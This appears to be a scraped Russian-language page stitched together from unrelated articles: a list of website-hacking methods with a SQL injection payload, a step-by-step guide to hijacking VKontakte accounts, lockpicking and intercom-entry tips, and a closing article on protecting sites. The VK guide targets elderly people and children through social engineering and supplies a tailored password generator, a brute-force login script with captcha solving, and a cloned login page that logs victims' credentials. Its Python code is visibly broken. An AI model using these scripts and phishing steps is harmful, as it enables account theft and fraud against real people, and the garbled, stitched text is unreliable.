Как вскрыть сайт: Взлом — Взломать сайт за 60 секунд | GeekBrains – Как взламывают сайты и как их защитить

Содержание

Как взломать сайт? — HelpSet.ru

Редактор реестра Windows - regedit

Многие хотят взломать сайт! Но не знают как и что для этого нужно. Ну давайте разберёмся, взломов сайта не так уж и много, да и далеко не каждый сайт можно сломать или взломать! Существует мнение, о каких-то людях, который якобы хакер и может взломать всё на свете — это не так, и далеко не всё на свете, ибо обратной стороной медали, для такого индивидума, существуют двое Молдован в тёмной подворотне… было холодно и скользко, он шёл один после работы… и итогом может служить не взлом сайта, а взлом черепа взламывающего 😉 Ну ладно, опустим лирику и перейдём к делу. И так, предположим, что вы захотели взломать сайт. Значит так, самое главное убедиться, и это должен сделать хакер (специалист), что данный сайт подвержен так называемым с недавних пор «уязвимостям» это ошибки, в программном обеспечении или программировании, связанные с недоработкой, или выводом из строя части или всей программы. Идём по пунктам:

1) Ошибка php-код типа: Warning php fatal error on line 127 /www/htdocs/  или asp-код код: server error 0x000345, 1; — позволяющая получить путь к htpasswd, паролям через include и БД, а также вывести пароль прямо на страничке в «скрытом месте». Всё — вы Админ!

2) XSS- межсетевая атака, когда в постинге сайта жертвы вы имплантируете свой код, в котором загружается иной сайт донор. Нужно узнать, можно ли «подломить сайт» через <iframe, <java — тут в первую страницу, можно подменить на поддельную, вынудив Администратора ввести пароль в вашей web-страничке и передать его вам. Админ!

3) SQL-инъекция. Когда, в адресной строке, вы можете выполнить, за счёт подмены, sql-запрос к БД и узнать пароль Админа. sql-инъекция типа: http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users—

4) Уязвимости в программном обеспечении (от Linux до Windows) позволяющие воспроизвести исполняемый код, позволяющий вас наделить правами Админа или получить через программу права Хозяина

5) ddos-атака. «Задалбливание» сервера (по различным портам) разным трафиком, вызывающий переполнение памяти и дальнейший отказ в обслуживании системы, за это время можно беспрепятственно получить доступ к ресурсу и стать Админом!

6) Атака через ssh-доступ, по средством автоматизации или скрипта, вызывающий банальный подбор паролей к доступам по ftp и ssh — после  удачного завершения программы — вы Админ ресурса!

7) Управление сервером, через ничего не подозревающий компьютер-зомби, через вирусы в системе жертвы… иные виды (это далеко не полный список)

Это самые основные требования, для того, что бы вы хотели взломать сайт. Каждый пунктик, это минимум прочитанная вами энциклопедия. Мало того, нужна ещё и большая практика. По этому, знать всего не возможно, если вы хотите сломать сайт Вашему шефу, коллеге по работе или просто недоброжелателю. Данный материал написан с целью ознакомления читателя, который, зная свою цель ставит себе задачей взломать сайт, а значит знает, чего он хочет раз прочёл этот текст. Что бы сломать сайт нужно обладать минимум знаниями web-Программиста до Sys-Админа!


А вы думаете это так просто? Нет, каждый сайт индивидуальный подход требует. Мы конечно можем проверить сайт на уязвимость, если вы таковой нам предоставите для анализа. Предоставить сайт для анализа можно тут, а взламывать его будете наверное Вы! Ещё, серьёзной особенностью является, и то, что мы можем предупредить Вас или Вашу фирму, о «слабых местах» вашего сайта! Так что обращайтесь! И на прощанье — пользуйтесь зарубежными прокси серверами для вашей безопасности.

Пошаговое руководство по взлому страницы ВКонтакте

В статье приводится несколько возможных способов взлома ВКонтакте, ориентированных на людей, недалёких в компьютерной безопасности.

Иными словами, при взломе будут использоваться не машинные, а человеческие уязвимости. Естественно, приведённые методы не универсальны (и слава богу!), и у кого-то может хватить мозгов на то, чтобы не поддаваться на ваши провокации. Но таких не так уж много, поверьте. Итак, начнём. Прежде всего, перед началом вам понадобятся страница, которую вы собираетесь "хакнуть", свободное время и безопасный доступ к ВКонтакте. Сам процесс взлома разделим на несколько шагов.

Прежде всего, нужно собрать как можно информации со страницы потенциальной жертвы, а именно:

    1. URL страницы.
      Сохраняем себе ID или, если там имеется буквенная замена, то ее. Аккаунты и другую нужную нам информацию, всякого рода твиттеры и тому подобное.
    2. Неплохо было бы заиметь почту цели.
      Если человек не только попал в сеть, вы сможете найти почту путем простого гугления. К примеру, особо удобно отыскивать почту на mail.ru. Также можно попробовать поискать Ф.И.О. цели и дату рождения. Или же другого рода такие комбинации. Если жертва имеет Мой Мир на mail, то почта будет в коде страницы или же в URL.

      В том случае, когда имеется почта без соц.сети от mail'a, почту можно выяснить, создав себе подставную почту на этом сервисе и поискав в мессенджере от мэйла. Как ещё один из способов, можно попробовать найти что-нибудь дельное с помощью аккаунтов цели в других социальных сетях. Например, попытаться пробить никнеймы из всех найденных аккаунтов по всем известным почтовым сервисам. Как вариант, можно попробовать использовать импорт почтовых контактов и предложение добавить этих людей в друзья. Регистрируем очередную фальшивую почту и получаем дополнительные аккаунты. Как альтернатива, можно попытать счастье, используя форму восстановления в Twitter'е, таким образом узнав часть почты. В FaceBook'е можно напрямую поискать аккаунт, введя почту в поиск.

    3. Телефон.
      Так, URL и почту узнали, осталось достать номер телефона. Не считая тех случаев, когда номер висит в открытом доступе на странице в соц. сетях или в каких-то проектах (Avito/HeadHunter/Покупка или продажа недвижимости/Свой сайт/Другое), остаётся только один метод. Имеется почта пользователя на mail'е. Вводим ее в форму восстановления в ВКонтакте, и приходит часть номера. А теперь то же самое, но на mail. И если номер там привязан, то вы увидите уже другую, вторую часть номера. Если почта не привязана, то тогда там есть секретный вопрос. Перебираем его и заставляем юзера привязать мобилку на сервис. Отлично, осталась всего пара цифр от почты. Чтобы их узнать, достаточно перебрать форму восстановления ВКонтакте уже с помощью номера. Всего-то 99 раз. Можно и автоматизировать. Также в некоторых случаях люди любят публиковать свой номер на странице, но закрывать часть номера звездочками, черточками и прочей ерундой, что также может упростить процесс взлома. Если повезет, то вам будут видны именно те цифры, которые недоступны в форме восстановления вк.

На данном этапе мы будем пробовать получить доступ к аккаунту цели. Рассмотрим самые простые приёмы:

1) «Социнженер»

Здесь сразу нужно оговориться, что этот способ годиться только для тех, кто мало что знает об интернете, но решил по каким-либо причинам зарегистрироваться в соц.сети. Как правило, это либо старики, либо дети.

Если вы хотите просто попрактиковаться, то новички ВКонтакте могут быть найдены здесь.
В данном случае, применяется один из законов психологии: человек, который не разбирается в чем-то, подсознательно доверяет тому, кто более опытен в конкретной области, и принимает его слова на веру.
Тут можно создать аккаунт представителя техподдержки, создать "официальную" почту администрации и прочее. И создать какую-нибудь легенду. Что новые пользователи обязаны проходить проверку после регистрации и дать, например, ссылку на некий тест, по итогу или для входа которого требуется логин-пасс от вк. Самое важное, чтобы вы действовали осторожно. Следует убедить пользователя, что он в безопасности. Этот приём хорошо сочетается с фейком. Кроме того, продвинутые социнженеры могут, узнав номер юзера, позвонить (анонимно, используя sip) и развести напрямую. Кроме того, вся указанная вами информация (номер телефона/упоминание фактов с указанием дат/другое) также помогает установить контакт с жертвой и косвенно говорит о том, что вы из техподдержки.

2) «Умный» перебор

Метод, рассчитанный на среднестатистических пользователей. Для него нам надо будет специальный словарь, заточенный под конкретного человека. Давайте разберёмся со структурой нашего словаря:

  • Личные данные. Сюда входят дата рождения (17.11.1992 = 1711, 1992, 17111992), возраст (1992, 2017 = 2017, 1992,  24), имя (Стас = stas, ctac) и фамилия (Иванов = ivanov).
  • Аккаунты из других соц. сетей и почтовые сервисы (twitter.com/stasik_ku , facebook.com/stasss1992, [email protected] = stasik_iv, stasss1992, stasss92).
  • Увлечения (футбол, плавание, молодежка = football, swimming, molodejka, molodegka).

Также есть страница вк, на которой написано, какие пароли следует указывать, какие символы возможны и самые частые пароли.
Получился лист из 14 строк. Но из него еще нужно создать комбинации паролей, которые могла бы создать наша жертва.
Представляю вам мой небольшой скрипт на python, который этим и занимается.

#! coding:utf-8
import sys,os
razdel = ['_',':',';']
def uniq(seq):
    seen = set()
    seen_add = seen.add
    return [x for x in seq if not (x in seen or seen_add(x))]

def brute_words(words):
    new_words = []

    for i in words:
        new_words.append(i)
        new_words.append(i[0].upper() + i[1:])
        new_words.append(i[0].upper() + i[1:-1] + i[-1].upper())
        new_words.append(i.upper())

    for j in spisok:
        new_words.append(i + j)
    for m in razdel:
        new_words.append(j + m + i)
        new_words.append(j + i)
        new_words.append(i * 2 + j)
        new_words.append(j * 2 + i)
        new_words.append(i[0].upper() + i[1:] + j)
        new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j)

   return uniq(new_words)

def generate(words_file):
    o = open(words_file, 'r')

words = o.read().splitlines()
for i in brute_words(words):
    print(i)

def main():
    try:
        argv1 = sys.argv[1]
        generate(argv1)
    except IndexError:
        print("Нужно указать файл")
    except IOError:
        print("Нет такого файла")

if __name__ == "__main__":
    main()

 

Из 14 получилось 1272 варианта. Приведу часть.

 

Molodegkactac

MolodegkActac

molodejka_molodegka

Stasss92molodejka

stasss92molodegka

molodegka_stasss92

molodegka:stasss92

molodegka;stasss92

stasss1992swimming

swimming_stasss1992

Kurayginctac

KuraygiNctac

kurayginkuraygin

kuraygin_kuraygin

molodegka17111992

1711199217111992molodegka

molodegkamolodegka17111992

24

1711_24

 

Отлично, теперь автоматизируем перебор паролей через мобильную версию ВКонтакте небольшим скриптом.

#! coding: utf8
import grab, re, urllib2
from antigate import AntiGate
from grab import GrabTimeoutError
from time import sleep

cap_key = '123 ' #Ваш ключ с Antigate
def anti(key, file): #Получение решения Captcha с Antigate
    try:
        try:
            data = AntiGate(key, file)
            return data
        except KeyboardInterrupt:
            print("Завершение")
    except:
        anti(key, file)

def save(url, file): #Скачивание файла по URL
    site = urllib2.urlopen(url)
    f = open(file, 'wb')
    f.write(site.read())

def cap_solve(img):
    save(img, 'captcha.jpg')
    key = anti(cap_key, 'captcha.jpg')
    return key

def brute(login, passwords, save):
    out = open(save, 'w')
    psswrds = open(passwords,'r')
    
    try:
        int(login)
        prefix = True
    except:
        prefix = False
    
    g = grab.Grab()
    g.go('http://m.vk.com')

    for line in psswrds:
        psswrd = line.rstrip('\r\n')
        g.doc.set_input('email', login)
        g.doc.set_input('pass', psswrd)
        g.doc.submit()

        if g.doc.text_search(u'captcha'):
            all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
            captcha = '' + all_captchas
            key = cap_solve(captcha)
            g.doc.set_input('email', login)
            g.doc.set_input('pass', psswrd)
            g.doc.set_input('captcha_key', str(key))
            g.doc.submit()
            print("cap")
            if 'Подтвердить' in g.response.body:
                if prefix:
                    prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
                    prefix2 = g.doc.rex_search(' [0-9]*').group(0)
                    pre1 = re.findall('[0-9]{1,}', prefix1)[0]
                    pre2 = re.findall('[0-9]{1,}', prefix2)[0]
    
                    login = login.replace(pre1, '')
                    login = login.replace(pre2, '')
    
                    g.set_input('code', login)
                    g.submit()
                    print(login + ':' + psswrd + '--success')
                    out.write(login + ':' + psswrd + '\n')
                else:
                    out.write(login + ':' + psswrd + '\n')
            else:
                if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
                    print(login + ':' + psswrd + '--fail')
                else:
                    print(login + ':' + psswrd + '--success')
                    out.write(login + ':' + psswrd + '\n')
    out.close()
    psswrds.close()

 

Естественно, пример не оптимизирован. Можно ещё добавить прокси, многопоточность и прочие плюшки, но этим уже сами займётесь, если будет интересно. Зато скрипт способен сам вводить недостающие цифры в защиту ВКонтакте при заходе с другой страны, а также, используя Antigate, запросто вводит Captch'и, появляющиеся после 5-6 попытки ввода с одного IP.

3) «Фейк — наше все»

Способ, ориентированный на невнимательных юзеров. По большей части их либо завлекают халявой, либо отвлекают внимание с помощью многобукв. Я покажу вам, как создать простой фейк на основе обычного сайта вк (страницы логина). Можете брать как мобильную, так и основную версии, зависит от того, с какого устройства будет заходить ваша цель. Что ж, приступим.
Первым делом качаем страницу логина вк через ваш браузер. Затем смените кодировку html файла на utf-8. Сначала определяем кодировку

file --mime-encoding file.html

 

Затем меняем с исходной на новую

iconv -f iso-8859-1 -t utf-8 file.html > vk2.html

 

Далее вам нужно создать управление страницей на серверном языке.

@route('/')
def index():
    return template('vk2.html')
    
@route('/Welcome! | VK_files/')
def server_static(filepath):
    return static_file(filepath, root='./Welcome! | VK_files/')

 

Как выяснилось, на кое-каких файлах порой выдаётся ошибка 404. У нас, к сожалению, не имеется нужных картинок с сайта, так что положим их в отдельную папку images.

mkdir images
cd images
wget
wget ""
wget ""
mkdir icons
cd icons
wget ""
wget ""

 

Пропишем новый роутинг в скрипте.

@route('/images/')
def server_static(filepath):
    return static_file(filepath, root='./images/')

 

Отлично. Конечно, по-хорошему надо было бы ещё также скачать основные страницы, на которые можно перейти с основной не залогинившись, чтобы было правдоподобней (а потом поменять ссылки в основной), но для начала и этого хватит.
Добавим роутинг для пост запроса. Найдем форму логина на странице. Изменим в ее коде action на пустое и удалим проверку onsubmit. И добавим обработку post-запроса.

@post('/')
def index():
    login = request.forms.get('email')
    password = request.forms.get('pass')
    print("|Catch|-------------- " + login + ':' + password)
    with open("log.txt", "a") as myfile:
        myfile.write(login + ':' + password + "\n")
    
    return redirect('http://www.vk.com')

 

В заключении, переносим тег button, что под формой в коде в пределы формы и добавляем свойство type="submit", и наслаждаемся тем, что всё работает. Для тех, у кого что-то не получилось, представляем архив с готовым решением.

Если вы желаете оптимизировать этот процесс и не хотите прописывать всё это ручками, то можете воспользоваться инструментом SET. (Social Engineer Toolkit).

Другие материалы по теме:

10 лучших ресурсов для изучения хакинга с помощью Kali Linux
5 лучших Android приложений для взлома Wi-Fi сетей
10 лучших инструментов для хакинга в 2017 году

Как открыть замок без ключа

В каждом городе есть службы экстренного вскрытия замков, готовые прийти на помощь всем, у кого захлопнулась дверь, потерялся или сломался ключ. Найти таких мастеров можно, введя в поисковике «открыть дверь название города».

Как правило, специалисты этих компаний быстро реагируют и справляются с любыми замками. При необходимости вам могут сразу же починить или сменить замок, а также сделать дубликат ключа. Услуги мастеров влетят в копеечку, зато вы сбережёте нервы.

Если замок не очень сложный и вы уверены в своих силах, можно попытаться открыть его самостоятельно. Есть варианты как с повреждением механизма, так и без. Не поможет один — всегда можно попробовать другой.

Как достать ключ, если он сломался в замке

Такое случается, как правило, с изношенными цилиндровыми замками. Скважина там узкая, а ключ плоский, поэтому, если перестараться в борьбе с заевшим механизмом, станет только хуже.

В первую очередь стоит попробовать открыть дверь остатком ключа. Для этого нужно утопить его до упора в щель, а затем вставить пилочку для ногтей или другой тонкий предмет и попытаться провернуть его, открывая замок.

Если ключ сломался так, что его часть торчит из скважины, вам повезло. Обломок довольно просто достать с помощью пассатижей или подобного инструмента. Одолжите его у соседей и аккуратно тяните остатки ключа, хорошо взявшись за торчащую наружу часть.

Можно также попробовать провернуть ключ и открыть замок.

Не вышло? Что ж, тогда придётся раздобыть пилку для лобзика. Её надо вставить в замочную скважину сбоку от ключа, направив зубчиками на себя.

Когда пилочка войдёт в щель до упора, разверните её на 90 градусов, чтобы подцепить ключ, и пробуйте достать его.

Ещё один вариант — извлечь остатки ключа, приклеив к нему сломанную часть. Аккуратно нанесите суперклей на место излома и соедините обе части.

Подождите немного, пока клей подсохнет, и пробуйте потихоньку достать ключ из скважины.

Как открыть навесной замок без ключа

Это самый распространённый и, как правило, примитивный замок, состоящий из корпуса с дужкой и личинки со штифтовым механизмом внутри. Вскрыть его без ключа можно без особого труда.

Способ 1. Отмычка из жести

  1. Вырежьте из любой жестяной банки букву «Т» с большими плечами.
  2. Вставьте отмычку в щель между корпусом замка и дужкой.
  3. Сложите длинные концы отмычки вместе и проворачивайте их, чтобы освободить запорный язычок.
  4. Потяните дужку на себя и откройте замок.

Способ 2. Отмычка из скрепок

  1. Возьмите две канцелярские скрепки и согните их так, как показано в видео.
  2. Вставьте первую скрепку в скважину замка и немного проверните её, чтобы создать напряжение.
  3. Второй скрепкой пробуйте нажимать на штифты внутри.
  4. Действуйте обеими скрепками одновременно, пока замок не откроется.

Способ 3. Гаечные ключи

  1. Возьмите два гаечных ключа побольше.
  2. Вставьте их внутрь дужки и уприте друг в друга.
  3. Надавливайте на ключи, пока дужка или корпус замка не сломается.

Как открыть цилиндровый замок без ключа

Такие замки запираются с помощью штифтов, собранных в едином блоке — личинке. Она имеет вращающуюся сердцевину с рядом подпружиненных стержней, разрезанных на две части.

Когда в скважине нет ключа или он неправильный, штифты входят в сердцевину и блокируют её. Ключ с правильным профилем поднимает штифты на такую высоту, что верхний прячется в корпус личинки, а нижний — в сердцевину, позволяя ей свободно вращаться и открывать замок.

Выходит, вам нужно утопить все штифты, чтобы освободить сердцевину личинки, а затем повернуть её. Для механизмов с несколькими оборотами процедуру придётся повторять.

Способ 1. Отмычка из шпилек

  1. Согните из шпильки или проволоки Г-образный рычаг, а из другой шпильки сделайте отмычку с согнутым кончиком.
  2. Вставьте рычаг в скважину и попытайтесь провернуть с минимальным усилием.
  3. В это же время отмычкой перебирайте штифты, поочерёдно нажимая на них.
  4. Когда штифты найдут своё место, сердцевина провернётся.
  5. Повторяйте предыдущие действия на каждом обороте, пока замок не откроется.

Способ 2. Отмычка из пластиковой карты

  1. Согните карту, немного закруглив её, и вставьте в щель между дверью и дверной коробкой.
  2. Двигая импровизированной отмычкой в районе замка, пытайтесь протолкнуть её глубже.
  3. Как только язычок механизма сдвинется, дверь откроется.

Способ 3. Высверливание штифтов

  1. Пометьте кернером место для сверления чуть ниже сердцевины личинки.
  2. Просверлите дрелью корпус личинки, разрушив блокирующие вращение штифты.
  3. Легонько постучите по личинке молотком или другим предметом.
  4. Проверните сердцевину с помощью отвёртки или другого ключа, чтобы открыть дверь.

Как открыть сувальдный замок без ключа

В основе механизма такого замка лежит набор сувальд — специальных пластин с фигурными прорезями. У правильного ключа выступы на бородке совпадают с этими прорезями. При вращении ключа сувальды поднимаются на нужную высоту, образовывая дорожку, по которой сдвигается запирающий штифт.

Чтобы открыть сувальдный замок, нужно поднять все пластины, выстроить их правильным образом и сдвинуть засов. Звучит легко, но на деле всё гораздо сложнее. Особенно для тех, кто делает это впервые.

Способ 1. Отмычка из спицы

  1. Согните из спицы или жёсткой проволоки отмычку с загнутым кончиком.
  2. Вставьте любой другой похожий ключ и немного проверните его, создав напряжение.
  3. Шевелите отмычкой, пытаясь поднять сувальды, и одновременно пробуйте повернуть ключ.
  4. Когда все пластины будут подняты, замок поддастся.
  5. Повторите процедуру для следующих оборотов ключа, пока дверь не откроется.

Способ 2. Высверливание хвостовика засова

  1. Найдите в интернете схему своего замка и узнайте точное расположение крепления засова.
  2. Отметьте нужное место и просверлите сверлом диаметром 10–12 мм корпус замка насквозь.
  3. Вставьте в отверстие отвёртку или воспользуйтесь спиленным ключом, чтобы сдвинуть засов и открыть дверь.

Как открыть домофон без ключа

Самый простой способ попасть в подъезд — позвонить в одну из квартир и попросить открыть дверь. Если это не ваш вариант, действуйте иначе.

Попробуйте воспользоваться сервисным меню домофона, из которого можно отдать команду открытия двери. Вход в это меню осуществляется с помощью специальной комбинации. Индивидуальной для каждой модели домофона, естественно.

Впрочем, найти подходящие команды в интернете не составит труда. Достаточно вбить в поиск «коды домофонов», ввести нужные символы, и дверь откроется.

Читайте также 🧐

Могут ли взломать мой сайт, если CMS и скрипты неуязвимы?

Предположим, что на сайте закрыты все уязвимости, пропатчены все бреши и он работает на коммерческой CMS самой последней версии. Могут ли взломать такой сайт?

Ответ – да, могут.

И для этого вовсе не обязательно обладать сверхординарными способностями и иметь в арсенале суперутилиты для взлома. Все гораздо проще, сайт могут взломать не только в результате атак через веб.

Взлом не через веб

Во-первых, взломать хорошо защищенный от веб-атак сайт могут через соседей по аккаунту. Если у веб-мастера несколько сайтов, то с наибольше вероятностью он разместит все сайты на одном аккаунте хостинга. Очень часто сайты на одном аккаунте хостинга не изолированы друг от друга, то есть cкриптами одного сайта можно вносить изменения в файлы другого сайта. И взлом одного сайта может привести к заражению всего shared-хостинга.

Обидно, если на хостинге пять сайтов, четыре из которых – хорошо защищенные интернет-магазины, а пятый - блог на уязвимом WordPress’е или сайт-визитка на Joomla. И именно последний случайно оказывается в поле зрения хакера. Иногда встречаются аккаунты, на которых «царит» настоящий бардак: множество папок со старыми версиями сайтов, тестовые площадки, заброшенные веб-проекты – и все они уютно соседствуют с рабочими веб-лошадками, генерирующими прибыль.

В нашей практике были случаи, когда взломы мультисайтового аккаунта происходили в результате «незасвеченного» нигде– ни в поисковиках, ни в социальных сетях – тестового сайта на техническом домене. Если сайт открывается в браузере и доступен для пользователей, то он доступен и для хакеров.

Сайт могут взломать, перехватив доступы. Предположим, веб-мастер, находясь в кафе или посещая какое-нибудь мероприятие (конференцию, форум, выставку), начинает обновлять на сайте контент. Для подключения он использует WiFi, который раздается организаторами мероприятия. При этом подключение к панели сайта или FTP происходит по незащищенному соединению. Кто находится рядом в этот момент – неизвестно. Доступы от FTP, SSH, хостинга могут быть легко перехвачены программой-сниффером трафика, которая работает у хакера, подключенного к той же сети или через взломанный WI-FI роутер (что сейчас достаточно частое явление).

Есть и другие грустные примеры. В начале марта к нам обратилась владелица сайта, чьи доступы с администраторскими правами к ее веб-проекту были перехвачены в результате заражения компьютера приходящего бухгалтера. История банальна и в тоже время поучительна. Бухгалтер имела доступ к сайту и партнерской базе, хранящейся на нем, поскольку в ее обязанности входило ежемесячное уведомление партнеров об оплатах. В результате взлома компьютера бухгалтера, хакер получил полный доступ к сайту и базе клиентов.

Каким бы неуязвимым ни был ваш сайт, взломать его могут посредством брут-форс атаки – подбора паролей, если ваш пароль слишком простой. Несмотря ни на что многие владельцы сайтов и веб-мастера упорно продолжают игнорировать главное правило создания безопасных паролей – пароли должны быть длинными и сложными, содержать случайную комбинацию цифр, букв и символов, а не комбинации года рождения и имен детей. Зачастую пароли от администраторских аккаунтов представляют собой простую комбинацию клавиш, которую легко запомнить или удобно воспроизвести на клавиатуре. Помните, что если легко вам – легче простого хакерам.

Доступ к сайту злоумышленники могут получить в результате компрометации более высокого уровня - взлома сервера: например, взлом VPS или выделенного сервера. Злоумышленник может получить логин и пароль от базы данных, затем через скрипт phpMyadmin загрузить бэкдор и уже через него выполнить любое необходимое действие с файлами и базой данных (включая “рутование”).

Взлом сервера могут осуществить и через старые компоненты операционной системы (до сих пор сотни серверов работают на уязвимой версии proftpd).

Наконец, получить доступ к хорошо защищенному сайту злоумышленники могут по вине ваших подрядчиков, которые недостаточно аккуратно обращались с вашими логинами-паролями к сайту и хостингу, передавали доступы третьим лицам, работали с зараженных компьютеров и так далее.

Как минимизировать риски взлома, которые происходят не через веб?

Вы автоматически избежите ряда проблем, если будете следовать приведенным ниже рекомендациям:

  1. выберите для размещения своих сайтов надежного хостера. Не хватает опыта и знаний по данному вопросу? – Выбирайте хостинг-провайдера из ТОП-10 РФ и СНГ. Не «ведитесь» на дешевые тарифы «доморощенных» хостеров. По сути, последние – даже не поставщики хостинговых услуг, а всего лишь реселлеры, которые арендовали или купили серверные площадки по более низкой «оптовой» цене, а продавать будут «в розницу» по более высокой. Надлежащей заботы и сервиса от таких горе-хостеров не ждите.
  2. Если на аккаунте хостинга находится несколько сайтов, позаботьтесь о том, чтобы все сайты были хорошо защищены. Важные для вас веб-проекты часто взламывают через забытые и давно ненужные интернет-ресурсы, соседствующие с ними на одном аккаунте. Не нужен сайт? Не планируете инвестировать в его безопасность? – Заблокируйте на время. Поддерживайте порядок на своем аккаунте. Беспорядок на хостинге – путь к беде.
  3. Закройте админ панель сайта дополнительным средством защиты – например, ограничением по IP, серверной аутентификацией или каким-то другим элементом двухфакторной защиты – например, через SMS. Таким образом вы сможете противостоять брут-форс атакам.
  4. Регулярно меняйте пароли. Частая смена паролей минимизирует риски несанкционированного проникновения на сайт злоумышленников (даже если в какой-то момент они смогли перехватить доступы).
  5. При работе в открытых WiFi сетях используйте защищенное подключение. Приобретите VPN аккаунт и используйте его при работе в публичных сетях.
  6. Работайте по безопасному протоколу SFTP, SFTPS, SSH вместо небезопасного
  7. Проводите инструктаж подрядчиков по безопасной работе с вашим сайтом, прежде чем предоставить доступы от сайта и хостинга. А после завершения работ поменяйте все пароли, удалите пользователей, которых создавали специально для выполнения задач, и проверьте сайт на предмет стороннего кода сканером вредоносного кода AI-BOLIT и веб-сканером ReScan.pro.

 

Обсуждаем и комментируем

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *